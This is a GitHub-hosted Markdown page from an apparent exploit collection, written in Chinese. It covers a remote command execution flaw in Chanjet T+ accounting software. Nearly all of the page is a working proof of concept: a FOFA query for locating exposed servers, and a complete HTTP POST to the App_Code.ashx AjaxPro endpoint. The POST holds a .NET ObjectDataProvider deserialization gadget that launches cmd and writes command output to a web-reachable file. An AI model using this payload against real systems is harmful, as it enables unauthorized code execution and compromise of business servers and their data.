Skip to content

Latest commit

 

History

History
36 lines (32 loc) · 1.13 KB

畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md

File metadata and controls

36 lines (32 loc) · 1.13 KB
Raw

畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞

fofa

app="畅捷通-TPlus"

poc

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Host: 127.0.0.1
X-Ajaxpro-Method: GetStoreWarehouseByStore
Content-Type: application/x-www-form-urlencoded
Content-Length: 570

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c whoami > test1.txt"
      }
    }
  }
}

写入文件路径:http://127.0.0.1/tplus/test1.txt